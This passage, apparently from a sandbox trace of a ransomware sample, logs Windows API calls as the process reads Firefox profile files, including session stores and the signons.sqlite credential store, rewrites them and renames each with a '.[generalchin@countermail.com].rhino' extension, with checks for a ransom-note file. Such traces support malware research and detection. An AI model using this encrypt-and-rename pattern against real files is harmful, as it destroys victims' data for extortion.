[0103.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0103.892] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0103.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0103.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x24b0428 [0103.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0103.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x24b06b8 [0103.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0428 | out: hHeap=0x6d0000) returned 1 [0103.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x24b0800 [0103.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b06b8 | out: hHeap=0x6d0000) returned 1 [0103.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x24b09e8 [0103.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0800 | out: hHeap=0x6d0000) returned 1 [0103.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b0048 [0103.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b09e8 | out: hHeap=0x6d0000) returned 1 [0103.893] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x24b06b8 [0103.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0103.893] WriteFile (in: hFile=0x104, lpBuffer=0x24b06b8*, nNumberOfBytesToWrite=0x4f6, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x24b06b8*, lpNumberOfBytesWritten=0x2cfa04*=0x4f6, lpOverlapped=0x0) returned 1 [0103.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b06b8 | out: hHeap=0x6d0000) returned 1 [0103.893] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4f6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.894] CloseHandle (hObject=0x104) returned 1 [0103.895] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0103.895] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x24b06b8 [0103.895] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0103.895] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0103.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b06b8 | out: hHeap=0x6d0000) returned 1 [0103.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0530 | out: hHeap=0x6d0000) returned 1 [0103.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0103.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0103.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0103.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x24b0048 [0103.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0103.896] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.897] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0103.898] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xbc5 [0103.898] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xce5, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.898] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.899] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0103.902] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.902] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xbc5, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xbc5, lpOverlapped=0x0) returned 1 [0103.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0103.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0103.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0103.902] GetLastError () returned 0x0 [0103.902] SetLastError (dwErrCode=0x0) [0103.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0103.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbc5) returned 0x24b0048 [0103.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0103.902] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x24b0c18 [0103.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x24b0d20 [0103.903] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0c18 | out: hHeap=0x6d0000) returned 1 [0103.903] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0103.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0103.903] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0103.903] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0103.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0103.903] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0103.903] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0103.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0103.903] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0103.903] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0103.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0103.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0103.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0103.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0103.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0103.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0103.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0103.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0103.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0103.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0103.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0103.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0103.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x24b0c18 [0103.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0103.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0048 [0103.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0c18 | out: hHeap=0x6d0000) returned 1 [0103.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b0190 [0103.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0103.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0378 [0103.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0190 | out: hHeap=0x6d0000) returned 1 [0103.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b0648 [0103.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0378 | out: hHeap=0x6d0000) returned 1 [0103.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75ef78 [0103.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0648 | out: hHeap=0x6d0000) returned 1 [0103.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b0048 [0103.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0103.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75ef78 [0103.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0103.905] WriteFile (in: hFile=0x104, lpBuffer=0x75ef78*, nNumberOfBytesToWrite=0xce5, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75ef78*, lpNumberOfBytesWritten=0x2cfa04*=0xce5, lpOverlapped=0x0) returned 1 [0103.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0103.905] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xce5, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.905] CloseHandle (hObject=0x104) returned 1 [0103.907] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0103.907] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x24b0ea8 [0103.907] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0103.907] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0103.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0ea8 | out: hHeap=0x6d0000) returned 1 [0103.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0d20 | out: hHeap=0x6d0000) returned 1 [0103.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.908] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0103.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0103.908] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0103.908] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x24b0048 [0103.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0103.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0103.908] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x50000 [0103.909] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x50120, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.909] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.909] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0103.972] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.972] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x50000, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x50000, lpOverlapped=0x0) returned 1 [0103.978] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0103.978] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.978] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0103.978] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0103.978] GetLastError () returned 0x0 [0103.979] SetLastError (dwErrCode=0x0) [0103.979] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0103.979] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50023) returned 0x23b0048 [0103.989] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0103.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x24b0048 [0103.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x24b0150 [0103.990] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.990] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0103.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0103.990] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0103.990] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0103.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0103.990] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0103.990] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0103.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0103.990] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0103.990] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0103.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0103.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0103.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0103.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0103.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0103.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0103.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0103.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0103.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0103.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0103.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0103.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0103.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x24b0048 [0103.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0103.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x24b02d8 [0103.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x24b0420 [0103.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0103.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x24b0608 [0103.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0420 | out: hHeap=0x6d0000) returned 1 [0103.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x24b08d8 [0103.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0608 | out: hHeap=0x6d0000) returned 1 [0103.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x2400078 [0103.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b08d8 | out: hHeap=0x6d0000) returned 1 [0103.992] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x24b02d8 [0103.992] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2400078 | out: hHeap=0x6d0000) returned 1 [0103.992] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x2400078 [0103.992] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0103.992] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x75ef78 [0103.992] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2400078 | out: hHeap=0x6d0000) returned 1 [0103.992] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7604b8 [0103.992] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0103.992] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x762480 [0103.992] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7604b8 | out: hHeap=0x6d0000) returned 1 [0103.992] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x765418 [0103.993] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x762480 | out: hHeap=0x6d0000) returned 1 [0103.993] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x73c0b8 [0103.993] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x765418 | out: hHeap=0x6d0000) returned 1 [0103.993] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x75ef78 [0103.993] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0103.993] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x73c0b8 [0103.994] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0103.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x70a650 [0103.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0103.997] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x781f78 [0104.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0104.002] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x32a39) returned 0x2400078 [0104.006] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0104.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4bf44) returned 0x2432ac0 [0104.056] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2400078 | out: hHeap=0x6d0000) returned 1 [0104.058] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x71ed4) returned 0x24b02d8 [0104.068] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2432ac0 | out: hHeap=0x6d0000) returned 1 [0104.073] WriteFile (in: hFile=0x104, lpBuffer=0x24b02e0*, nNumberOfBytesToWrite=0x50120, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x24b02e0*, lpNumberOfBytesWritten=0x2cfa04*=0x50120, lpOverlapped=0x0) returned 1 [0104.075] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0104.075] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x50120, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.075] CloseHandle (hObject=0x104) returned 1 [0104.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0104.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x2400078 [0104.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0104.083] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS 